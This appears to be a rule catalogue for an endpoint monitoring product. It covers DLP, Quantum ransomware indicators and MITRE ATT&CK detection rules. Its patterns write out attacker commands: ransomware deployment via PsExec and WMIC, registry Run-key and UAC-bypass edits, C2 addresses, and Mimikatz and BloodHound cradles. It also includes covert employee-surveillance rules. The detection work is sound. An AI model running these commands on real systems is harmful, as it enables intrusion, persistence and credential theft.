Protected Health Information (PHI), including drug names and medical terminology, is subject to strict HIPAA requirements. Any outbound email containing PHI must be caught before it leaves the organization.

This rule uses the Health Content (Drug) classifier to detect drug-related terminology in outgoing emails with attachments sent externally. The Block action immediately prevents the email from being sent, ensuring PHI does not leave without authorization.

Specific high-value shared drives may need targeted monitoring to detect unauthorized access. For example, a product or finance employee browsing the marketing team's files would trigger this rule.

This rule fires when a specific Google Drive folder URL is accessed. The Notify action alerts the designated data owner (in this case, AJ Davidson) so they can review the access in context.

This policy provides a detection framework specifically tuned to the tactics, techniques, and procedures (TTPs) observed in the Quantum ransomware attack chain, as documented in threat intelligence reports. It maps directly to MITRE ATT&CK techniques and is designed to detect the attack at multiple stages.

The Quantum ransomware attack chain includes a Cobalt Strike beacon for command-and-control. Detecting network connections to the known C2 IP provides the earliest possible warning of active compromise.

This rule fires when any network connection is detected to the known Cobalt Strike C2 IP address 185.203.118.227. The Warn action triggers immediately to alert the security team (MITRE ATT&CK ID: T1071.001).

The Quantum ransomware initial access vector involves a malicious ISO file disguised as an invoice. Detecting access to this specific filename provides an early-stage tripwire.

This rule fires when a File Access operation is detected on a file matching the known Quantum dropper filename docs_invoice_173.iso. The Warn action fires immediately to alert the security team.

Before deploying ransomware, threat actors often enumerate installed security software to determine what defenses they need to evade. The Quantum chain uses WMI to query the Security Center.

This rule fires when the specific WMI command WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List is executed from the command line. The Warn action fires immediately.

Network connection enumeration is used to identify accessible hosts, shares, and services that can be leveraged for lateral movement in the next phase of the attack.

This rule detects the net config workstation command executed from the command line, which reveals the workstation's network configuration and active connections. The Warn action fires upon detection.

Quantum ransomware uses rundll32.exe to execute a malicious DLL (dar.dll) as part of its execution chain, leveraging a trusted Windows binary to bypass application whitelisting.

This rule fires when rundll32.exe dar.dll,DllRegisterServer is detected in command-line arguments. The Warn action fires immediately to alert the security team.

Quantum actors use AdFind.exe and net view commands to enumerate the domain, discovering all computers, users, organizational units, and trust relationships to plan their lateral movement.

This rule fires when any of the following are detected in command-line arguments: net view /all /domain, adfind.exe, adfind.bat, or AdFind object category filters (-f (objectcategory=person), -fobjectcategory=computer, etc.). The Warn action fires on detection.

Quantum uses PsExec to execute remote commands and stage files across the environment. Detecting PsExec usage is a critical indicator of the lateral spread phase.

This rule fires when command-line arguments contain psexec.exe or the specific Quantum service execution command (-s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\ttsel.exe). The Warn action fires immediately.

The Quantum attack chain uses a .lnk shortcut file (document.lnk) to execute malicious code when the user opens what appears to be a document. Detecting file activity on this specific filename is a high-confidence indicator.

This rule fires on any file operation (Access, Rename, Write, Delete, folder operations, Copy) involving a file matching document.lnk. The Warn action fires to alert the security team.

Discovering domain trust relationships allows attackers to identify paths for lateral movement and privilege escalation across multiple domains. Quantum uses nltest for this purpose.

This rule fires when nltest /domain_trusts or nltest /domain_trusts /all_trusts is detected in command-line arguments. The Warn action fires immediately.

Quantum ransomware uses the IcedID banking trojan as an initial access broker. Detecting connections to known IcedID C2 domains provides critical early warning of compromise.

This rule fires when network connections are made to known IcedID C2 domains including dilimoretast.com, antnosience.com, oceriesfornot.top, or any IP in the associated quantumIP Shared List. The Warn action fires to alert the security team.

Enumerating domain group membership helps attackers identify high-value targets, such as domain administrators and privileged users, to prioritize for credential theft.

This rule fires when a command-line argument matches the regex net.*group.*domain, which detects all variants of the net group /domain command used for domain account discovery. The Warn action fires on detection.

In the impact phase, Quantum uses WMI to execute its ransomware payload (ttsel.exe) on remote machines via cmd.exe.

This rule fires when wmic or the specific command process call create "cmd.exe /c c:\windows\temp\ttsel.exe" is detected from the command line. The Warn action fires immediately.

Quantum uses cmd.exe to copy its ransomware binary to the Windows temp directory on remote machines as part of the deployment phase.

This rule fires when command-line arguments contain C:\Windows\system32\cmd.exe /K copy ttsel.exe or c$\windows\temp\. The Warn action fires to surface this critical stage of the attack chain.

WMI's remote node capability is used by Quantum to execute commands on remote machines, a key lateral movement mechanism that doesn't require opening new network ports.

This rule fires when a command-line argument matches the regex wmic.*node, detecting any WMI remote execution invocation. The Warn action fires immediately.

Quantum installs a scheduled task with a specific GUID and DLL name to ensure it persists across reboots, enabling the ransomware to re-execute even if the initial payload is removed.

This rule fires when command-line arguments contain the Quantum-specific task name (kajeavmeva_{B8C1A6A8-541E-8280-8C9A-74DF5295B61A}) or the associated DLL arguments (Ulfefi32.dll",DllMain --alyege="SketchRare\license.dat"). The Warn action fires immediately.

System information enumeration (systeminfo) is performed by Quantum early in the attack chain to determine the target environment, operating system version, and installed patches before selecting the appropriate exploit or payload.

This rule fires when cmd.exe /c chcp >&2, systeminfo, or systeminfo.exe are detected in command-line arguments. The Warn action fires on detection.

This policy provides a curated set of example rules covering the most common and universally applicable monitoring scenarios. It serves as a starting point for new Teramind deployments and can be customized to match specific organizational needs.

Anonymous browsers like TOR allow users to browse the web without leaving identifiable traces. Their use on corporate devices almost always violates acceptable use policies and may indicate an employee attempting to bypass monitoring.

This rule fires when tor.exe is launched (exact match). The Notify action alerts the designated administrator with no user-facing message, enabling a covert first look before escalating.

Modifying driver files in C:\Windows\System32\drivers can disable security software, intercept system calls, or establish kernel-level persistence. Any write or deletion in this directory warrants immediate investigation.

This rule fires on Write or Delete operations on .sys files in c:\windows\system32\drivers, or on Copy operations originating from that directory. The Notify action alerts the administrator.

The Windows hosts file controls local DNS resolution. Modifying it can redirect domain lookups to attacker-controlled servers, enabling phishing, credential harvesting, or C2 communication.

This rule fires on any Write operation to the exact path c:\windows\system32\drivers\etc\hosts. The Notify action alerts the administrator immediately.

This rule combines file origin tracking with content inspection to detect a specific high-risk scenario: a user downloads a file containing credit card data from SharePoint and then sends it externally via email.

This rule fires when an outgoing email is sent and the content contains a credit card number (any count), where the file's origin URL matches sharepoint.our-domain.com. The Notify action alerts the administrator. (Replace the SharePoint URL with your organization's domain.)

Accusatory communications sent over email or IM can signal interpersonal conflicts, workplace misconduct, or pre-litigation disputes. Detecting these patterns early allows HR and legal teams to intervene before situations escalate.

This rule uses a rich set of regex patterns to detect accusative phrases in outgoing emails and IMs, including patterns like "you were not authorized", "you messed up", "I didn't authorize", "you didn't follow my instructions", and similar expressions of blame or grievance. The Notify action alerts the designated administrator.

Screenshots are the most common method for capturing sensitive information displayed in web applications. This rule specifically targets screenshot activity while a known sensitive CRM contact page is open.

This rule fires when snippingtool.exe is active AND the current webpage URL contains a specific contact list URL (ui.cogmento.com/contacts). Both conditions must be met simultaneously. The Notify action alerts the administrator.

Any system login outside of normal business hours, particularly a fresh login rather than a screen unlock, represents a risk that warrants real-time notification to security or IT management.

This rule fires when a user logs in fresh (not a screen unlock) before 7:00 AM or after 7:00 PM. The Notify action sends an email to the configured security contact with details of the after-hours session.

Executing programs directly from USB drives or cloud-synced folders (like Dropbox or OneDrive) bypasses standard software installation controls and can introduce untrusted code to the endpoint.

This rule fires when an executable file (.exe, .bat, .com, .msi, .ps1) is accessed from an external drive (%EXTERNALDRIVES%) or from a cloud-synced folder (Dropbox, Google Drive, OneDrive, Box). The Block action prevents execution and the Notify action alerts the administrator.

Any email sent outside the organization that contains content originating from SharePoint represents a potential data leakage event: the content may have been extracted specifically for the purpose of sending it externally.

This rule fires when an outgoing email contains content (in body or attachment) where the file's origin URL matches sharepoint.our-domain.com. The Notify action alerts the administrator. (Replace with your SharePoint URL.)

Tracking outbound emails with specific file types provides visibility into what kinds of documents employees are sharing externally, enabling targeted review of high-risk attachment types.

This rule fires when an outgoing email contains an attachment with a name ending in .pdf, .bat, .zip, or .docx. The Notify action alerts the designated security contact.

Mass file deletions, whether accidental or malicious, represent a significant risk of data loss. This rule both prevents the deletion and ensures that an administrator is notified immediately.

This rule fires when a Delete operation is detected on any file across all drives (%ALLDRIVES%) or external drives (%EXTERNALDRIVES%). The Block action prevents the deletion from completing and the Notify action alerts the assigned administrator.

Excessive time spent on social media during work hours represents a productivity drain. This rule provides a time-based enforcement mechanism that automatically redirects users after they exceed the permitted daily usage limit.

This rule fires when the user has spent more than 50 minutes (3,000 seconds) on facebook.com or youtube.com in a single day. The Warn action displays a message to the user and the Redirect action automatically navigates them away from the site to google.com.

Windows security events contain critical audit information about authentication, session management, and system state changes. This rule creates Teramind alert records correlated with key Windows Event IDs.

This rule fires when any of the following Windows Log Events are generated: 4624 (successful logon), 4625 (failed logon), 4647 (user-initiated logoff), 4634 (logoff), 6009 (unexpected restart), 1074 (shutdown initiated), 6006 (clean shutdown), or 6008 (unexpected shutdown). The Notify action alerts the administrator.

Copying data from an internal SharePoint page and pasting it into an external website is a targeted exfiltration technique that bypasses file-level DLP controls entirely.

This rule fires when clipboard content originates from sharepoint.our-domain.com and is pasted into any page that does not belong to our-domain.com. The Notify action alerts the administrator of the cross-domain clipboard operation.

Social Security Numbers are among the most regulated categories of PII. Any outbound email containing an SSN, in body or attachment, must be immediately flagged for compliance review.

This rule uses the Personal Content (SSN) classifier to detect Social Security Numbers in outgoing emails. One or more SSN matches triggers the Notify action, alerting the designated administrator.

Third-party remote desktop tools that provide inbound access to endpoints can be exploited by external parties or used by employees to grant unauthorized access to corporate systems.

This rule fires when any of the known remote desktop clients (teamviewer, gotomeeting, vnc, or logmein) are launched by application name. The Block action prevents the application from running and the Notify action alerts the administrator.

Writing corporate files to USB drives or other removable media is a primary physical exfiltration vector. This rule ensures every such event is logged and the user is warned.

This rule fires when a Write operation is detected on any file targeting %EXTERNALDRIVES%. The Warn action displays a message informing the user they have saved a file to external media, and the Notify action simultaneously alerts the administrator.

Receiving email from a competitor's domain may indicate recruitment attempts, social engineering, or intelligence gathering. Early detection allows the organization to respond proactively.

This rule fires when an incoming email is received from an address containing @my-competitor.com. Update this field with your actual competitor domains or a Shared List. The Notify action alerts the administrator.

Private/incognito browsing mode is used by employees to avoid local browsing history and may also be used to circumvent some web filters. Detecting its use provides visibility into this behavior.

This rule fires when any webpage is visited in private/incognito mode (privateMode = true). The Notify action alerts the designated user's manager without any user-facing message, enabling covert review.

The combination of a name and a Social Security Number is the minimum dataset required for identity theft. This rule detects this specific combination across all common exfiltration vectors.

This rule fires when both a person's name (English) AND an SSN are detected together in any of the following activities: file uploads outside the corporate domain, file writes, file copies, outgoing emails to external addresses, or clipboard operations outside the authorized CRM application or corporate domain. The Notify action alerts the administrator.

All outbound emails with attachments sent to recipients outside the corporate domain represent a potential data leakage event and should be logged for audit purposes.

This rule fires when an outgoing email contains an attachment and is sent to any address that does not contain @my-domain.com. The Notify action alerts the administrator once per event.

Large print jobs may represent an employee creating physical copies of bulk data, such as documents, records, or reports, for removal from the office.

This rule fires when a print job of 60 or more pages is submitted. The Notify action alerts the designated administrator.

Sending a CV or resume from a corporate email account is a strong behavioral indicator of an employee actively pursuing external opportunities, an important flight risk signal.

This rule fires when an outgoing email contains an attachment with a name containing "resume" or "cv". The Notify action alerts the designated administrator.

In high-security environments, all external drive access may need to be completely prohibited to prevent any physical data exfiltration or malware introduction via removable media.

This rule fires on any file operation (Access, Rename, Write, Delete, folder operations, Copy) involving %EXTERNALDRIVES%. The Block action prevents the operation from completing and the Notify action alerts the administrator.

TeamViewer provides a persistent remote access channel that bypasses network access controls. Blocking it entirely on corporate devices ensures that remote access is only possible through authorized, monitored channels.

This rule fires whenever teamviewer is detected in the application name. The Block action immediately terminates the launch.

Files containing Social Security Numbers uploaded to SharePoint represent an elevated risk, particularly when those files may then be shared with external parties via SharePoint links.

This rule fires when an SSN is detected in a file being uploaded to teramind.sharepoint.com. The Notify action alerts the designated administrator.

Hostile or offensive emails sent from corporate accounts create workplace safety, HR, and legal liability risks. Detecting this content before it causes harm enables timely intervention.

This rule uses regex patterns to detect highly offensive phrases in outgoing emails, including variations of "you fucked up", "what the hell happened", "piece of shit", and other expressions of workplace hostility. The Notify action alerts the designated administrator.

Preventing RDP connections to unauthorized subnets ensures that sensitive servers or networks are not accessed from workstations that should not have that privilege.

This rule fires when mstsc.exe (Microsoft Remote Desktop) attempts a connection to any host not in the allowed subnet (10.120.150.0/24). The Block action prevents the connection and the Notify action alerts the administrator.

P2P applications represent a compliance, security, and bandwidth risk. Detecting known torrent and P2P clients enables enforcement of acceptable use policies.

This rule fires when any of the following are detected in the application name: torrent, gnutella, edonkey, limewire, napster, kazaa. The Notify action alerts the administrator.

This policy monitors and responds to unproductive behavior patterns, including job searching, excessive idle time, and other indicators of disengagement or resignation intent.

Time spent on job-search platforms during work hours is a direct productivity concern and a behavioral indicator of disengagement or departure intent.

This rule fires when a user visits known job-search sites including glassdoor, careerbuilder, monster.com, indeed.com, theladders.com, or dice.com as a full page visit (not background resource load). The Warn action displays a message to the user and the Notify action alerts the designated administrator.

Employees sometimes use AI tools to help draft resignation letters, update LinkedIn profiles, or ask career transition questions, all while at work. Detecting this intent early provides HR with advance notice.

This rule fires when the word "Resignation" is typed while the active tab is on chatgpt.com, chatgpt, perplexity.ai, or gemini.google.com. The Notify action sends an email alert to the configured HR or management contact.

Dark web .onion links pasted into or from files on corporate drives represent a significant security concern: employees may be communicating with threat actors or accessing illegal marketplaces.

This rule fires when clipboard content containing the text .onion is involved in any file operation (read or write) on either local drives (%ALLDRIVES%) or external drives (%EXTERNALDRIVES%). The Block action prevents the file operation from completing.

Extended idle periods during work hours represent a productivity concern. This rule enforces a minimum activity standard by warning employees who have been idle for more than 30 minutes.

This rule uses an Agent-Based Schedule criterion to detect when a user has been idle for more than 1,860 seconds (31 minutes) during any period of the day. The Warn action displays a message to the user: "You have been idle for more than 30 minutes. Please return to work immediately. Continued idle time may result in disciplinary action."

This policy covers MITRE ATT&CK Tactic TA0001 (Initial Access), covering the techniques adversaries use to gain a first foothold in a network.

The rules in this policy are designed to detect the earliest stages of an attack, before the adversary can establish persistence or move laterally.

Adversaries use removable media as an infection vector by placing malicious autorun.inf files on USB drives that execute automatically when the drive is inserted into a new system.

This rule fires when an autorun.inf file is accessed on an external drive (excluding drive R:), or when the PowerShell command New-Item -Path $Drive is executed from the command line, a technique used to programmatically create autorun entries on inserted media. No action beyond logging is configured by default.

This policy covers MITRE ATT&CK Tactic TA0002 (Execution), covering techniques used to run malicious code on a system. Detecting execution activity provides a critical second layer of defense after initial access has occurred.

Python is a powerful scripting language increasingly used in attacks. Any Python execution on an endpoint not authorized for development warrants logging.

This rule fires when python.exe is launched. No action beyond logging is configured by default (severity 70).

Creating scheduled tasks that run at logon or startup is a common persistence and execution technique used by both attackers and legitimate software. All such creations should be audited.

This rule fires when schtasks /create with /sc onlogon or /sc onstart parameters is detected from the command line, or when the Task Scheduler MMC snap-in is opened. No action beyond logging is configured by default.

WMI is a powerful Windows subsystem frequently abused by attackers for code execution, reconnaissance, and lateral movement. Any wmic command-line invocation should be logged.

This rule fires when any command-line argument containing wmic is detected. A Notify action with a daily threshold of 1 alerts the Main Admin (severity 80).

VBScript files (.vbs) are commonly used in phishing payloads and malicious macros. Detecting their access or execution provides early warning of script-based attacks.

This rule fires when a .vbs file is accessed on any drive, or when a command-line argument contains .vbs. No action beyond logging is configured by default.

The legacy at.exe Windows task scheduler is sometimes used by attackers to execute code at a specific future time, making it harder to correlate with the initial compromise.

This rule fires when at.exe is run from the command line. No action beyond logging is configured by default.

This specific PowerShell command is a known Mimikatz delivery technique that uses a complex series of keystrokes to load and execute the credential dumping tool via Notepad, avoiding direct PowerShell download.

This rule fires when the exact Mimikatz CradleCraft command string is detected in command-line arguments. No action beyond logging is configured (severity 85), but the specificity of this indicator makes it a near-certain confirmation of credential theft activity.

Any PowerShell invocation from the command line, when it does not originate from Microsoft Teams, is logged once per day as a general PowerShell execution baseline.

This rule fires when a command-line argument contains powershell (excluding msteams). A daily Notify action with a threshold of 1 alerts the Main Admin.

Batch scripts and direct command shell invocations (.bat, .cmd, /c switch) are a fundamental execution mechanism for both legitimate automation and attacks.

This rule fires when command-line arguments contain .bat, .cmd, or /c (excluding URLs containing //c). No action beyond logging is configured by default.

Invoke-CimMethod with the PS_ScheduledTask namespace is a stealthier method of creating scheduled tasks that bypasses some security monitoring focused only on schtasks.exe.

This rule fires when Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace is detected in command-line arguments. No action beyond logging is configured.

This rule detects a direct PowerShell download-and-execute technique for Mimikatz, using IEX and Net.WebClient.DownloadString to load the credential dumper directly into memory.

This rule fires when command-line arguments contain the PowerShell DownloadString Mimikatz URL or Invoke-Mimikatz -DumpCreds. No action beyond logging is configured (severity 85).

services.exe and sc.exe are used by both legitimate administrators and attackers to install and execute Windows services, a common persistence and execution vector.

This rule fires when command-line arguments contain services.exe or sc.exe, or when the MMC Services snap-in is opened. No action beyond logging is configured.

Detecting schtasks /create with on-logon or on-start triggers covers the most common malicious scheduled task persistence patterns.

This rule fires when schtasks /create /tn /sc onlogon or /sc onstart /ru system is detected from the command line, or via the Task Scheduler MMC snap-in. No action beyond logging is configured.

BloodHound is an Active Directory reconnaissance tool used by both red teams and attackers to map attack paths to domain admin. Detecting its local execution is a high-confidence indicator of active AD enumeration.

This rule fires when PowerShell arguments contain import-module SharpHound.ps1 or Invoke-BloodHound -OutputDirectory $env:Temp. No action beyond logging is configured (severity 85).

This rule captures additional variants of scheduled task creation commands using regex matching to cover all schtasks create with onlogon, once, or onstart triggers.

This rule fires when command-line arguments match schtasks.*create.*onlogon, schtasks.*create.*once, or schtasks.*create.*onstart, or via the Task Scheduler MMC snap-in. No action beyond logging is configured.

This specific command is an Application Whitelisting bypass technique that uses a known-vulnerable application path to launch cmd.exe with elevated privileges.

This rule fires when the exact Invoke-AppPathBypass PowerShell command string is detected. No action beyond logging is configured (severity 85).

This variant executes BloodHound's SharpHound ingestor directly from GitHub into memory using a download cradle, leaving no file on disk and evading file-based detection.

This rule fires when PowerShell arguments contain the BloodHound IEX download cradle from the GitHub URL or Invoke-BloodHound. No action beyond logging is configured (severity 85).

This policy covers MITRE ATT&CK Tactic TA0003 (Persistence), covering techniques used by adversaries to maintain access after reboots, credential changes, or other interruptions. These rules monitor registry modifications, startup locations, account creation, service installation, and other persistence mechanisms.

Background Intelligent Transfer Service (BITS) is a legitimate Windows service frequently abused by malware to download payloads in the background while appearing to be normal system activity.

This rule fires when bitsadmin.exe /transfer /Download /priority Foreground is detected in command-line arguments. No action beyond logging is configured (severity 90).

SystemBC is a malware-as-a-service proxy tool used in many ransomware campaigns. It establishes persistence by writing to the Registry Run key.

This rule fires when PowerShell commands targeting a $RunKey variable and Set-ItemProperty on that key are detected. No action beyond logging is configured (severity 85).

JScript encoded files (.jse) placed in the Windows Startup folder execute automatically at every logon, providing simple, persistent code execution.

This rule fires when command-line arguments reference startup folder paths in combination with cscript.exe and .jse file operations, or when Copy-Item .jse is detected. No action beyond logging is configured (severity 85).

This technique hijacks the Recycle Bin shell extension by overwriting its registry open\command value, causing arbitrary code to execute whenever the Recycle Bin is opened.

This rule fires when the specific reg ADD "HKCR\CLSID\{645FF040...}\shell\open\command" command is detected. No action beyond logging is configured (severity 85).

Adding entries to the RunOnce registry key causes a command to execute once the next time a user logs in, a common technique for delayed payload delivery after initial access.

This rule fires when $RunOnceKey = or set-itemproperty $RunOnceKey "NextRun" is detected in command-line arguments. No action beyond logging is configured (severity 85).

The Active Setup registry key runs commands for each user the first time they log in after the key is created, making it an effective per-user persistence mechanism.

This rule fires when HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ is referenced in command-line arguments. No action beyond logging is configured (severity 70).

Winlogon Helper DLL hijacking replaces legitimate DLLs loaded by the Windows logon process, providing system-level persistence that executes before the user desktop loads.

This rule fires when the Winlogon registry paths are referenced in command-line arguments. No action beyond logging is configured (severity 90).

Batch files placed in the Windows Startup folder run automatically at every logon, providing a simple persistence mechanism.

This rule fires when command-line arguments contain Copy-Item .bat targeting startup folder paths, or when cscript.exe is invoked with startup folder paths and .bat extensions. No action beyond logging is configured (severity 85).

desktopimgdownldr.exe is a LOLBin (Living Off the Land Binary) that can download files from the internet while disguised as a desktop wallpaper update, a BITS abuse technique.

This rule fires when cmd /c desktopimgdownldr.exe /lockscreenurl: is detected in command-line arguments. No action beyond logging is configured (severity 90).

Creating new domain accounts is a persistence technique that gives attackers a durable foothold even after their initial compromised account is disabled.

This rule fires when New-ADUser or net user /add is detected in command-line arguments, or when the MMC "New Object - User" dialog is opened. No action beyond logging is configured (severity 75).

VBScript files in the Startup folder provide script-based persistence that can be harder to detect than executable persistence.

This rule fires when Copy-Item .vbs targeting startup folders, or cscript.exe with startup folder paths, are detected. No action beyond logging is configured (severity 85).

Re-enabling the built-in Windows Administrator account (which is disabled by default) gives attackers a privileged, well-known account that is often overlooked in security monitoring.

This rule fires when net user /active:yes is detected in command-line arguments, the command used to activate a disabled Windows account. No action beyond logging is configured (severity 75).

This comprehensive BITS detection rule covers the full attack chain: creating a BITS job, adding a file, setting a notification command, resuming the job, and completing it, a pattern used to download and execute malware.

This rule fires when any of the BITS lifecycle commands (bitsadmin /create, /addfile, /setnotifycmdline, /resume, /complete) are detected. No action beyond logging is configured (severity 90).

Registering a malicious DLL as a Netsh helper causes it to load whenever netsh.exe is invoked, providing stealthy, event-triggered persistence.

This rule fires when HKLM\SOFTWARE\Microsoft\Netsh is referenced in command-line arguments or when add helper is detected. No action beyond logging is configured (severity 80).

The W32Time service's time provider registry key can be hijacked to load a malicious DLL whenever the Windows Time service starts, a subtle persistence mechanism.

This rule fires when HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ is referenced in command-line arguments. No action beyond logging is configured (severity 80).

This comprehensive rule covers all major Windows Run key locations used for persistence, one of the most commonly abused mechanisms by malware.

This rule fires when any of the major HKCU\Software\Microsoft\Windows\CurrentVersion\Run*, HKLM\Software\Microsoft\Windows\CurrentVersion\Run*, startup folder, Winlogon, or Session Manager paths are referenced in command-line arguments. No action beyond logging is configured (severity 95).

Adding a specific RunOnceEx key entry with a DLL path causes the DLL to be loaded on the next logon, a variant of RunOnce persistence that supports DLL loading.

This rule fires when REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d is detected. No action beyond logging is configured (severity 85).

WMI Event Subscriptions can trigger arbitrary code execution when system events occur, providing highly persistent and difficult-to-detect fileless malware execution.

This rule fires when mofcomp.exe, Get-WMIObject -Namespace, WMI-Persistence, or the regex wmic.*namespace are detected. No action beyond logging is configured (severity 90).

Configuring Outlook's macro security settings and creating .bas files in the Outlook directory establishes a command-and-control channel through email, using Outlook's VBA capabilities.

This rule fires when commands modifying Outlook's security registry key or creating files in %APPDATA%\Microsoft\Outlook\ are detected. No action beyond logging is configured (severity 80).

The HKCU\Software\Microsoft\Office test\Special\Perf registry key loads any DLL specified in its value every time an Office application starts, a rarely-used but effective persistence mechanism.

This rule fires when reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" is detected. No action beyond logging is configured (severity 70).

Adding a value to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via REG ADD is the most direct and common form of per-user registry persistence.

This rule fires when REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" is detected in command-line arguments. No action beyond logging is configured (severity 95).

Modifying UAC policy settings can silently disable User Account Control, removing a critical elevation prompt barrier and enabling attackers to execute privileged operations without user consent dialogs.

This rule fires when policy system registry values for ConsentPromptBehaviorUser or EnableInstallerDetection are modified via command line. No action beyond logging is configured (severity 85).

Creating a shortcut (.lnk) in the user's Startup folder via PowerShell WScript.Shell.CreateShortcut is a common technique for adding persistent execution that survives reboots.

This rule fires when PowerShell commands creating a shortcut via $WScriptShell = New-Object -ComObject WScript.Shell and $Create.Save() are detected. No action beyond logging is configured (severity 85).

Adding custom folder home pages to Outlook via registry (reg.exe add HKCU\Software\Microsoft\Office\) can load malicious content from a remote URL each time the folder is opened in Outlook.

This rule fires when the specific Outlook registry modification command is detected. No action beyond logging is configured (severity 70).

Hijacking the default file handler for common extensions (.txt, .pdf, etc.) causes malicious code to execute whenever a user opens a file of that type.

This rule fires when HKEY_CLASSES_ROOT. is referenced in command-line arguments, indicating a file association modification. No action beyond logging is configured (severity 80).

Writing to HKCU\Environment\UserInitMprLogonScript causes a script to run every time the user logs in, before the shell is started, providing stealthy, pre-desktop persistence.

This rule fires when this specific registry path is referenced in command-line arguments. No action beyond logging is configured (severity 85).

Using PsExec or net use with local account credentials is a common lateral movement technique that leverages existing, legitimate accounts to move between systems.

This rule fires when PsExec, psexec, PsExec64, psexec64, or net use are detected in command-line arguments. No action beyond logging is configured (severity 70).

Disabling UAC detection of installer elevation attempts by modifying EnableInstallerDetection allows installers to run silently without triggering security prompts.

This rule fires when UAC policy registry modifications are detected (same pattern as T1574.010 above). No action beyond logging is configured (severity 85).

LSADUMP commands (ChangeNTLM, SetNTLM) are used by Mimikatz to directly modify NTLM password hashes in the Local Security Authority, enabling password-less persistence.

This rule fires when LSADUMP::ChangeNTLM or LSADUMP::SetNTLM are detected in command-line arguments. No action beyond logging is configured (severity 85).

Covers all variants of local and domain user account creation through both GUI (MMC "New User" dialog) and command-line (net user add, New-LocalUser, net user /ADD /DOMAIN, New-ADUser).

This rule fires when any user creation event is detected through any of these methods. No action beyond logging is configured (severity 75).

Replacing the system screensaver executable with a malicious binary causes it to execute whenever the screensaver activates, a classic event-triggered persistence technique.

This rule fires when Write or Delete operations targeting screensaver files (scrnsave.scr) are detected, or when registry keys controlling screensaver settings (HKCU\Control Panel\Desktop\) are modified. No action beyond logging is configured (severity 75).

On Unix-like systems, the trap command intercepts signals, providing a way to execute code when specific events occur. This rule detects its presence in scripts or command-line executions.

This rule fires when the trap keyword is detected in command-line arguments. No action beyond logging is configured (severity 70).

Modifying service registry keys, particularly the ServiceDll value, allows attackers to load malicious DLLs through legitimate Windows services.

This rule fires when service registry paths (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll) or get-acl are detected in command-line arguments. No action beyond logging is configured (severity 85).

Creating or modifying a Windows service via sc.exe or the MMC Services snap-in is a high-value persistence and privilege escalation technique that provides SYSTEM-level execution.

This rule fires when sc.exe is detected in command-line arguments or when the MMC Services snap-in is opened. No action beyond logging is configured (severity 95).

Creating a local Windows user account via command line (net user /add, Add-NetUser) or MMC provides the attacker with a persistent login that survives domain-level credential resets.

This rule fires when these local account creation commands are detected or when the MMC "New User" dialog is opened. No action beyond logging is configured (severity 75).

Start-BitsTransfer is the PowerShell equivalent of bitsadmin and is used to perform background file downloads through the BITS service.

This rule fires when Start-BitsTransfer -Priority foreground -Source is detected in command-line arguments. No action beyond logging is configured (severity 90).

Authentication packages registered in HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ are loaded by the Windows authentication process, providing system-level persistence with full credential access.

This rule fires when Lsa registry paths (Authentication Packages, RunAsPPL) are referenced in command-line arguments. No action beyond logging is configured (severity 75).

A comprehensive BITS detection rule using regex to catch all BITS-related commands including Start-BitsTransfer, bitsadmin create/addfile/SetNotifyCmdLine/SetMinRetryDelay/resume/transfer patterns.

This rule fires when any BITS-related command pattern is detected. No action beyond logging is configured (severity 90).

Writing to PowerShell profile files causes code to execute every time a PowerShell session is started, providing silent persistence in development environments where PowerShell is used regularly.

This rule fires when Write or Delete operations target $PsHome\Profile.ps1 or $Home\My Documents\PowerShell\Profile.ps1, or when Add-Content is used from the command line to append to these files. No action beyond logging is configured (severity 80).

Malicious Outlook inbox rules can silently redirect emails, delete security notifications, or forward communications to an attacker's address, all triggered by incoming email.

This rule fires when New-InboxRule or Set-InboxRule are detected in command-line arguments, or when Outlook is open with the "Create Rule", "Rules and Alerts", or "New Rule" dialog titles visible. No action beyond logging is configured (severity 60).

This policy covers MITRE ATT&CK Tactic TA0004 (Privilege Escalation), covering techniques used by adversaries to gain higher-level permissions than they initially obtained. These rules monitor UAC bypass attempts, token manipulation, policy modifications, and boot/logon autostart mechanisms that can be exploited for elevation.

Injecting a malicious DLL via the Winlogon registry key grants the DLL execution at the highest privilege level during the logon sequence.

This rule fires when the Winlogon registry paths (HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ or the HKCU equivalent) are referenced in command-line arguments. The Warn action fires on detection.

Disabling installer elevation detection via UAC policy keys allows installers to run as SYSTEM without triggering elevation prompts.

This rule fires when the UAC policy registry keys are modified via command line. The Warn action fires on detection.

Adding a malicious DLL as a Security Support Provider (SSP) causes it to be loaded by lsass.exe with SYSTEM privileges, providing both persistence and access to credential material.

This rule fires when Get-ItemProperty targeting the LSA Security Packages value or Set-ItemProperty modifying that value are detected. The Warn action fires on detection.

Using eventvwr.msc as a UAC bypass is a well-known technique: setting the HKCU\software\classes\mscfile\shell\open\command registry key causes Event Viewer to run the attacker's code as Administrator.

This rule fires when reg.exe add hkcu\software\classes\mscfile\shell\open\command or cmd.exe /c eventvwr.msc is detected. The Warn action fires on detection.

Modifying UAC Installer Detection settings silently weakens the elevation protection mechanism.

This rule fires when UAC system policy registry values are modified via command-line. The Warn action fires on detection.

This broader UAC bypass rule catches execution of eventvwr.exe from the command line or modification of HKCU\Software\Classes\ms-settings\shell\open\command, a sdclt-based bypass.

This rule fires when these patterns are detected. The Warn action fires on detection.

Directly disabling UAC by setting EnableLUA to 0 removes all User Account Control protections, allowing any process to run with Administrator privileges without prompts.

This rule fires when reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 is detected. The Warn action fires immediately.

The runas command and Invoke-RunAs create new processes under a different user's security context, effectively impersonating another user's privileges.

This rule fires when runas or Invoke-RunAs are detected in command-line arguments. The Warn action fires on detection.

Active Setup persistence also provides privilege escalation in some configurations, running with the privileges of any user who logs in.

